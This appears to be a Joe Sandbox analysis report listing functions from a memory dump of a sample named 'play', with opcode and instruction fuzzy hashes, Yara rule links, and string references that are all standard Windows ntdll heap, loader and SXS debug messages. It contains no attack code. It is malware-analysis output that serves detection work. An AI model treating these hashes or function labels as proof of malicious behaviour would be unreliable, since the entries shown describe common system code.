Instruction ID: 3a647c476c63e99bf42c7aa8e9a4d15e9429235d5bf1a463553386a34b2261c3
Opcode Fuzzy Hash: c63ead6db868c39181c152d82f1874a242be82a0445bee7be2b17505ba60c38b
Instruction Fuzzy Hash: 7E419071A84300EBD721FB64DC84B6B77E9EF48750F24892EB949D7290E770D811CBA6

Function 026A70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 026A7C96, 026A8696
HEAP: , xrefs: 026A7C7C, 026A867F
HEAP[%wZ]: , xrefs: 026A7C6D, 026A8670

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 72ef04129b324f15f1cea28e0fd6130acc1784e14aa0b401f492a1bcf6219a2b
Instruction ID: a0cb876ecdc99d18b2033eb8b401c6fb6c95f6a2432e0fe280dafd84aa931796
Opcode Fuzzy Hash: 72ef04129b324f15f1cea28e0fd6130acc1784e14aa0b401f492a1bcf6219a2b
Instruction Fuzzy Hash: 81136A70A00655DFDB29CF68C8A07ADFBB2BF49304F1481A9D849AB385D774AD46CF90

Function 026AA840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON

Download Yara Rule

Strings

SsHd, xrefs: 026AA885
SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 026F7D56
SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 026F7D39
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 026F7D03

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
API String ID: 0-2905229100
Opcode ID: b06add870adc93016e274be3d84434039cbdf34e0e7cf30b7c8e1cc066961c7e
Instruction ID: 6e6d55aa83afdccf2b7160474ddfd1dad80c44a7f0ddc9ae38a4158535e3cac3
Opcode Fuzzy Hash: b06add870adc93016e274be3d84434039cbdf34e0e7cf30b7c8e1cc066961c7e
Instruction Fuzzy Hash: F4D17C32A00219DBDF29CFA8D8D06ADB7B6FF48314F15416AE945AB351D3319D91CFA0

Function 0269A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 0269A3E7
LdrResFallbackLangList Enter, xrefs: 0269A3EF
6, xrefs: 0269A3F7
LdrResFallbackLangList Exit, xrefs: 0269A3FF

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: b63c0c80323be262f34d231f0b659a7a9c50e0df724ae383d2cf29d70d4f5531
Instruction ID: 64d72f1071e385c2a91a294e8c370ce66c2e2fdba232ed235c2f33fbd6271e2a
Opcode Fuzzy Hash: b63c0c80323be262f34d231f0b659a7a9c50e0df724ae383d2cf29d70d4f5531
Instruction Fuzzy Hash: EBC16975208382CFCB55CF98C544B6AB7E8BF85708F04896AF9958B350EB34CD4ACB56

Function 026C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 026C8591
minkernel\ntdll\ldrinit.c, xrefs: 026C8421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 026C855E
LdrpInitializeProcess, xrefs: 026C8422

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: f86e6663f9a1a6fa0a9a36422ebe6b29c42a19c02b1bd45226f98fc1c85b31e8
Instruction ID: 5c193d116693435225107093f4cc643428f8b7dd84f347ad68d14527bca90368
Opcode Fuzzy Hash: f86e6663f9a1a6fa0a9a36422ebe6b29c42a19c02b1bd45226f98fc1c85b31e8
Instruction Fuzzy Hash: 9D916C71648344AFE721EB21C890FBBB7E9FB84744F90496EFA8592151E370D904CF66

Function 026A0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 026F54ED
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 026F55AE
HEAP: , xrefs: 026F54E0, 026F55A1
HEAP[%wZ]: , xrefs: 026F54D1, 026F5592

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: ab49c31c1c3546086524adf28da7942dac65c50c3d9e2ebd5a819d5af46f90af
Instruction ID: 1c169f6e7fed4840ddaf74c1b7c2ab867721edf1009067b04a7681369068f505
Opcode Fuzzy Hash: ab49c31c1c3546086524adf28da7942dac65c50c3d9e2ebd5a819d5af46f90af
Instruction Fuzzy Hash: 7EA1DE31A00246DBDB28DF28C4A0BBAFBE6BF45304F14856DD88A8B781D775AD45CF91

Function 026C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 027022B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 027021D9, 027022B1
.Local, xrefs: 026C28D8
SXS: %s() passed the empty activation context, xrefs: 027021DE

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 99e7d6b5587dfdef382b6299301390b92557505b0bbbfe3f43bd538d5577465a
Instruction ID: 15749b8678a450bb31cfb4b9b804f70b8507370f37c83043c3e4967c28935bcc
Opcode Fuzzy Hash: 99e7d6b5587dfdef382b6299301390b92557505b0bbbfe3f43bd538d5577465a
Instruction Fuzzy Hash: D6A19A32900229DBCB28DF65C898BA9B3B1FF58318F2501E9DC09A7351D7309E85CF94

Function 026C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 02703437
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 02703456
RtlDeactivateActivationContext, xrefs: 02703425, 02703432, 02703451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0270342A

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 96a82fdc0bad16974a35ddb521521d062da894aa4b093f9b07acc3f93e7a2d99
Instruction ID: 969bacbaeac871df649b82712a1b5db5bf0d4136f1ff7398f049042f703f91f4
Opcode Fuzzy Hash: 96a82fdc0bad16974a35ddb521521d062da894aa4b093f9b07acc3f93e7a2d99
Instruction Fuzzy Hash: 7E61EE32640711DBD726DE18C891B3AB3E5EF80B54F2485ADF8569F290DB30E805CB95

Function 026964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 026F0FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 026F1028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 026F10AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 026F106B

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 3250066072d90656c4b1a8d14f3017a675c8805e19960c53cca59b3b6351c89c
Instruction ID: a0bbbc622900efed4212919d287c8e90e56a6ee57e32aa065510755120764c25
Opcode Fuzzy Hash: 3250066072d90656c4b1a8d14f3017a675c8805e19960c53cca59b3b6351c89c
Instruction Fuzzy Hash: 0071EFB19043449FCB20DF24C884B9B7BADAF45764F404468FA498B296DB34D589CFD2

Function 026B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 026B2462
LdrpDynamicShimModule, xrefs: 026FA998
minkernel\ntdll\ldrinit.c, xrefs: 026FA9A2
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 026FA992

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: c02d1ad81e28ce601ec91fd62462112a431d91125beebe353939b295dfacfb14
Instruction ID: 2a94fd21f6f4a9a498231dba9ec89da63d99c70647296a86db4ac56ecc273f72
Opcode Fuzzy Hash: c02d1ad81e28ce601ec91fd62462112a431d91125beebe353939b295dfacfb14
Instruction Fuzzy Hash: E0316A71A90201EBEF219F9CDC85FAA77B9FB80B10F254469EE056B340C7705C92CB90

Function 026A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 026A3264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 026A327D
HEAP[%wZ]: , xrefs: 026A3255

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 74fe5637f8a56087b8d059b66e2b5a7a3edb5c217204bd48ca2aa39ccc1b604d
Instruction ID: 390c08ff43bc7561512650aaad89c4e6edec6f9c2831f4edfc3ac3b0b20830e1
Opcode Fuzzy Hash: 74fe5637f8a56087b8d059b66e2b5a7a3edb5c217204bd48ca2aa39ccc1b604d
Instruction Fuzzy Hash: 7792AB70A042489FDB29CF68C4647AEBBF1FF49304F188099E84AAB391D735AD42CF50

Function 027202C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON

Download Yara Rule

Strings

MitigationAuditOptions, xrefs: 0272032D
"""", xrefs: 027204D0
MitigationOptions, xrefs: 02720326

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: """"$MitigationAuditOptions$MitigationOptions
API String ID: 0-1670051934
Opcode ID: afba46bc4d0ad5b969be5f634396f255c08569ad1ae1a2b7dd244b5f99560aef
Instruction ID: 76e942da2ff33721bd625b08862e7d3582eb10a6853ea27161d8171de0f152ad
Opcode Fuzzy Hash: afba46bc4d0ad5b969be5f634396f255c08569ad1ae1a2b7dd244b5f99560aef
Instruction Fuzzy Hash: 9C22D272A047228FD724CF29C99162AFBE2FBE4314F14892EE1DA97750D771E508CB61

Function 026A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 026F50CA
HEAP: , xrefs: 026F50BD
HEAP[%wZ]: , xrefs: 026F50AE

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 6d04a0604a4e046ba3d374d91e5e9a588103b5d94c7d70734069f013a859b415
Instruction ID: 947d2c2aeeacd5797ab8397f2a55d7a81d40654775d6469493dc922c48c1cf51
Opcode Fuzzy Hash: 6d04a0604a4e046ba3d374d91e5e9a588103b5d94c7d70734069f013a859b415
Instruction Fuzzy Hash: F5F19B70A00605EFEB19CF68C8A4B6AB7B6FF45304F1482A9E5169B391D734ED81CF91

Function 02691460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02691728
HEAP: , xrefs: 02691596
HEAP[%wZ]: , xrefs: 02691712

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: f86964c302b55a3b9f38885275ed13caa30bf9eb89e27f2b3b8e42c0d3114773
Instruction ID: 9c730721dff26d3e9780a85a279cbd49341e3ad24a1a1fa58ad66d94f0c9838b
Opcode Fuzzy Hash: f86964c302b55a3b9f38885275ed13caa30bf9eb89e27f2b3b8e42c0d3114773
Instruction Fuzzy Hash: C8E1E170A042469FDF29CF28C491B7ABBF9AF4A314F24859DE49ACB345DB34E941CB50

Function 026B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 026B6C24
, xrefs: 026FCA51

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: b8d1013a88b9371dfc3853a34a838d89362db86bf389fa6f7fba0b1c7bac3be5
Instruction ID: c8fb8cc1fe686efbfea746d9255b79cf9942ced5914ad66080ce13e1a6ed1719
Opcode Fuzzy Hash: b8d1013a88b9371dfc3853a34a838d89362db86bf389fa6f7fba0b1c7bac3be5
Instruction Fuzzy Hash: 52C26172A083459FDB66CF24C881BABBBE5AFC8744F04892EE989C7351D734D845CB52

Function 0268A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 026EC1E4
FilterFullPath, xrefs: 026EC2E6
UseFilter, xrefs: 0268A1C1

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 58036959bf18181ee8e912d12404c1a14e9ec5caa9fc8962d8a58af9957d8260
Instruction ID: 7186d4a50b7d5acc56a82bc63b1dd7c2da460831685db33eae95ae89d61a4f91
Opcode Fuzzy Hash: 58036959bf18181ee8e912d12404c1a14e9ec5caa9fc8962d8a58af9957d8260
Instruction Fuzzy Hash: CDA189719112299BDF31DF64CC98BEAB7B9EF48704F1001EAE909A7250E7359E84CF54

Function 026B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 026FA10F
LdrpCheckModule, xrefs: 026FA117
minkernel\ntdll\ldrinit.c, xrefs: 026FA121

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 069c50f84edd8e984bce241959a44defae2cd13a963a0de0c995879a116786a7
Instruction ID: 3792d1c121ff5d1e1c1de1303d947adf82d9ced3272b1ccc34e0934fdd5a89c7
Opcode Fuzzy Hash: 069c50f84edd8e984bce241959a44defae2cd13a963a0de0c995879a116786a7
Instruction Fuzzy Hash: A771CD70E40205DBDB19DFA8C981BAEBBF5EF48704F24846DD9069B350E730AD86CB50

Function 026A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 026F534D
HEAP: , xrefs: 026F5342
HEAP[%wZ]: , xrefs: 026F5335

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 353b0deb1070d49f0d99583c3f69fbdea30f4d7b5a05d33c6a38b8e486d594ec
Instruction ID: d6e40af6b3c328fee7b6747c5ac60f26fb40a44479fb6f63dc5165b1d10288a5
Opcode Fuzzy Hash: 353b0deb1070d49f0d99583c3f69fbdea30f4d7b5a05d33c6a38b8e486d594ec
Instruction Fuzzy Hash: 5261BC716003019FDB28CF28C594B6ABBE6FF45708F148599E95A8B392E771EC81CF91

Function 0273DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

Heap block at %p modified at %p past requested size of %Ix, xrefs: 0273DC32
HEAP: , xrefs: 0273DC1F
HEAP[%wZ]: , xrefs: 0273DC12

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 003b1cad714b5216e6c1f089513eca2ea202b3b7fa91a200661431587cf33391
Instruction ID: 8c540c2c712f18238b005c124db2a56eba2ee7d46692091b15381a687225ce6f
Opcode Fuzzy Hash: 003b1cad714b5216e6c1f089513eca2ea202b3b7fa91a200661431587cf33391
Instruction Fuzzy Hash: B25126362101548EE777DF2AC8847B273E2EF45648F14888EE4C2CB283E376D842DB61

Function 0274C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0274C212
@, xrefs: 0274C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0274C1C5

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 3a729e05dc9a438acbeb3818971566e4b08ad65d4d311a9d6a8658f4e8ca26fc
Instruction ID: 4bda8aa07126a547016cc5b9cbe99496499b254bab35db4e48a9cec4fe7a6e3a
Opcode Fuzzy Hash: 3a729e05dc9a438acbeb3818971566e4b08ad65d4d311a9d6a8658f4e8ca26fc
Instruction Fuzzy Hash: 43414271E0121DEBDB11DED4C891BEFB7B9AB18B04F14416FE905B7280EBB49A44CB54

Function 02724144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 02724225
LdrpResValidateFilePath Exit, xrefs: 02724172
LdrpResValidateFilePath Enter, xrefs: 02724160

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: f7924e5606b184115ceda221f57123108c52e796a9d7837eb16fff4ec5c5ac72
Instruction ID: b7b5c2fdd6bbfd8b2e91d50c5af78351ae3b860d4d65606e0c677da07e14fe41
Opcode Fuzzy Hash: f7924e5606b184115ceda221f57123108c52e796a9d7837eb16fff4ec5c5ac72
Instruction Fuzzy Hash: FC41E231900268CBEB22DBE5C964BAEB7F9EF45344F24049AD801FB781D7748905CF11

Function 02714755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02714888
LdrpCheckRedirection, xrefs: 0271488F
minkernel\ntdll\ldrredirect.c, xrefs: 02714899

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: a2115869f5d9486dc9fa4de2f3c896e755ad62d860536d6b1a1f9d7a6b48eace
Instruction ID: 207b7ee7a5f64a99b90d7495614cb7065d31375b275140a225ae015ebc793926
Opcode Fuzzy Hash: a2115869f5d9486dc9fa4de2f3c896e755ad62d860536d6b1a1f9d7a6b48eace
Instruction Fuzzy Hash: 3B41D272A542929FCB22CF6CD861B26BBE5EF49B54F090569EC49EB311D730E800CB91

Function 026A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 026F5449
HEAP: , xrefs: 026F543E
HEAP[%wZ]: , xrefs: 026F5431

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 6c94d9630cc64f087d6ea1afebd1c35a4e9304608b6d61fdf6dfe2a61a27e2b2
Instruction ID: b3cc9ddc33b2c09ea6c61dc59ab77622065fab5900175c047c2b9ffbc4fac7da
Opcode Fuzzy Hash: 6c94d9630cc64f087d6ea1afebd1c35a4e9304608b6d61fdf6dfe2a61a27e2b2
Instruction Fuzzy Hash: 62112E303561019FEF6CDA14C8A1B7AB3A9EF41B1AF54826DE407DB250EB30EC41CB99

Function 027120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 027120FA
Process initialization failed with status 0x%08lx, xrefs: 027120F3
minkernel\ntdll\ldrinit.c, xrefs: 02712104

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 6023dd8e66f66a7fb57519c65e8fc20ac99fede15b6d9b5c5d3fbe487fc096a6
Instruction ID: fcd38dac114931a15340550529f903d3d4e19f86da27721ccf993a14d6fbfee8
Opcode Fuzzy Hash: 6023dd8e66f66a7fb57519c65e8fc20ac99fede15b6d9b5c5d3fbe487fc096a6
Instruction Fuzzy Hash: D4F04C70A80318BFF714D60CDC57FA93768EF41B14F100455FE0477281D2B0A954CA41

Function 026A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 026F4D8A

Strings

#%u, xrefs: 026F4D82

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: adf54d9f177cab65357e5e21cf105c0876227d1437b57f970df398fbd3a5ad1b
Instruction ID: 6e31593aedb58863716f85597cb9f6bd46fbee4adcf04679c036880ff85fbce1
Opcode Fuzzy Hash: adf54d9f177cab65357e5e21cf105c0876227d1437b57f970df398fbd3a5ad1b
Instruction Fuzzy Hash: 3C714872A00149DFDB05DFA8C994BAEB7B9FF08704F144069EA05A7391EB34AD51CFA4

Function 026A52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 026A55A3
@, xrefs: 026A5445

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 430285a310e26de1bf3d1952aeda0b0c174c22e99211d8f65afb343f0c44531e
Instruction ID: dead8529700501539672861de9d350e3050487b15bae05879ad82aecd3424d71
Opcode Fuzzy Hash: 430285a310e26de1bf3d1952aeda0b0c174c22e99211d8f65afb343f0c44531e
Instruction Fuzzy Hash: A03279719083518BCB28CF19C4A0B7EB7E5EF84748F94491EE9969B2A0E734DC45CF92

Function 0269A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0269AA13
LdrResSearchResource Exit, xrefs: 0269AA25

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: b76f5e378a86cb422d68bd4b598c1d658eed819a284803351eebb8c1c0afb411
Instruction ID: 8ef2be6676e52483331d4ffead068198152ae1364fb559f687ba387a9fa948da
Opcode Fuzzy Hash: b76f5e378a86cb422d68bd4b598c1d658eed819a284803351eebb8c1c0afb411
Instruction Fuzzy Hash: A4E17B71E01259EBEF25CED9C994BAEB7BEAF04314F10406AE901EB354EB349D41CB50

Function 0275A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0275A44B
`, xrefs: 0275A551

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 2d0d91b29b13b8294a28c19870af04009a7a5eaecd700513d54a9b59af76dff1
